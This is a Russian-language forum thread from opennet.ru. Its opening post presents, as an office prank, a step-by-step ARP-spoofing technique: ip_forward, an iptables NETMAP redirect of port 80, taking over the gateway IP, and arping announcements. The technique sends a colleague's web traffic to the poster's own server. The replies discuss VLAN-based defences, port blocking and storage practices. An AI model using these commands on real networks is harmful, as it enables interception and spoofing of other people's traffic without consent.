https://www.opennet.ru/openforum/vsluhforumID3/71166.html Используя нехитрые манипуляции в Linux можно подшутить или удивить соседа по офису, например отобразив персональное поздравление при попытке открыть соседом какой-нибудь известного ресурса. Манипуляции проделываются без изменения конфигурации шлюза, путем поднятия web-сервера на своей машине и перенаправление на него запросов, через подмену ARP-адреса шлюза в кэше на машине соседа. Техника действует только в пределах локальной сети.<br><br>Включаем на своей машине перенаправление IP-пакетов:<br><br> echo 1 &gt; /proc/sys/net/ipv4/ip_forward<br><br>Перенаправляем запросы на 80-порт, заменив адрес назначения в пакете на 192.168.1.200 - локальный IP машины с подставным шлюзом. На локальной машине должен быть заблаговременно поднят http-сервер с нужной страницей.<br><br> iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200<br><br>Добавляем адрес реального шлюза (192.168.1.1) на сетевой интерфейс:<br><br> ip addr add 192.168.1.1/24 dev eth0<br><br>Анонсируем смену MAC-адреса шлюза:<br><br> arping -c 3 -A -I eth0 192. https://www.opennet.ru/openforum/vsluhforumID3/71166.html#38 Fri, 10 Dec 2010 13:01:04 GMT &gt;&gt; шутка удается с первыми лицами предприятия (и до них это доходит) -<br>&gt;&gt; админ идет искать работу<br>&gt; Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ <br>&gt; админящий такую сетку пойдет искать работу.<br><br>может они просто поменяются местами тогда уж?<br> https://www.opennet.ru/openforum/vsluhforumID3/71166.html#37 Sat, 09 Oct 2010 16:55:38 GMT Да не в этом дело. Можно хоть на каждого сотрудника заводить VLAN. И они будут друг друга прекрасно "видеть" по сети. Вот о чем я говорил выше. :) Кстати, технология VLAN per user - используется у нас - я у провайдера местного работаю. Очень надежная технология. Терминация VLAN-IP делается на цисках (6-тонниках и 2950). Если юзверь поменяет себе IP (что актуально в сетях домовых провайдеров) - фиг у него будет сеть работать. :) Просто и надежно. Хотя и влечет за собой довольно большие накладные расходы - как финансовые (применение только управляемых свичей, ограничение количества VLAN на кошках), так и организационные (необходимо вести базу вланов и назначать их - с последующим прописыванием на цисках).<br> https://www.opennet.ru/openforum/vsluhforumID3/71166.html#36 Sat, 09 Oct 2010 05:28:52 GMT &gt;&gt; Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике. <br>&gt; Наверное все-таки "терминируемых". :)<br><br>Упс. Бывает :). Перечитал научно-популярного чтива на тему детерминирована ли наша Вселенная, в то время как термин "терминируемые" относительно vlan-ов использовал в своей жизни считанное кол-во раз :)<br><br>&gt;&gt; И "маршрутизация" во всю используется :)<br>&gt; Ну дык - а в чем тогда проблема? Для доступа к<br>&gt; компьютерам в другом влане используется маршрутизация (SVI или IP unnumbered -<br>&gt; не суть важно).<br><br>Я честно сказать не цисковод, и что есть перечисленные термины могу представить только смутно. Разве что я так понимаю, это какие-то технологии для объедидения vlan-ов. И честно сказать не очень понимаю смысл таких велосипедов, особенно когда идёт речь о vlan-е сотрудников _одного_ отдела. Тем более как я уже сказал ранее, тут клиенты измеряются тысячами и если в данных технологиях требуется на каждого заводить свой vlan, то эта технология мягко говоря неприемлема, т.к. тут исторически исп https://www.opennet.ru/openforum/vsluhforumID3/71166.html#35 Fri, 08 Oct 2010 20:46:03 GMT Чет вас понесло.<br>Личный негативный опыт?)<br> https://www.opennet.ru/openforum/vsluhforumID3/71166.html#34 Thu, 07 Oct 2010 22:51:51 GMT &gt; А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4<br>&gt; sata винта выходят вообще недорого)<br><br>Ну да. А потом у таких умников нагибается сервант (любая железка может сломаться) и вся контора радостно курит бамбук. Знаем мы эти совковые Ынтерпрайзы, где на эффективность и безгеморность работы сотрудников всем класть с прибором, зато какойнить бзик по части "как бы чего не сперли" или какой там еще фигне. При том кому надо - все-равно успешно все прут, зато когда централизованный сервак дает дуба - толпа народа радостно курит бамбук а админы срут кирпичами :). ИМХО зависимость работы всей конторы от 1 сервера - зло. Так, глядя на то какой пипец начинается когда сервак подыхает :)<br><br>Алсо нынче в моде например виртуализация. Представляете себе если програмеры/тестеры/прочий сброд начнут какиенить там временные тестовые виртуалки на много мегазов а то и гигазов каждая на фтпушник лить? И ессно забудут стирать. А на квоты периодически брыкаться когда они работе мешают. И насколько таким макаром мест https://www.opennet.ru/openforum/vsluhforumID3/71166.html#33 Wed, 06 Oct 2010 15:16:31 GMT &gt;&gt; - для этого используется корпоративная почта/ftp.<br>&gt; Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И<br>&gt; даже довольно быстро.<br><br>Ну у вас и аргументы, уважаемый =)<br>Не, ну правда - подсистемы хранения сейчас относительно дешевы.<br>Если предприятие такое большое, что документы забивают терабайты, то на 4 sas винта в raid10 + контроллер e200 деньги найдутся.<br>А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4 sata винта выходят вообще недорого)<br> https://www.opennet.ru/openforum/vsluhforumID3/71166.html#32 Wed, 06 Oct 2010 15:10:49 GMT &gt; Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу,<br>&gt; задрать аларм в NMS ... У менея же порешили что и<br>&gt; порт блокировать - вполне резонно. Пока ни одного шутника не уволили<br>&gt; ибо шутка получается против себя :)<br><br> Ну это уже зависит от уровня "фашизма" админа. :) Во многих случаях вполне обоснованного.<br> https://www.opennet.ru/openforum/vsluhforumID3/71166.html#31 Wed, 06 Oct 2010 15:08:56 GMT &gt; Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике. <br><br> Наверное все-таки "терминируемых". :)<br><br>&gt; И "маршрутизация" во всю используется :)<br><br> Ну дык - а в чем тогда проблема? Для доступа к компьютерам в другом влане используется маршрутизация (SVI или IP unnumbered - не суть важно).<br> https://www.opennet.ru/openforum/vsluhforumID3/71166.html#30 Wed, 06 Oct 2010 06:12:32 GMT &gt; шутка удается с первыми лицами предприятия (и до них это доходит) -<br>&gt; админ идет искать работу<br><br>Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ админящий такую сетку пойдет искать работу.<br>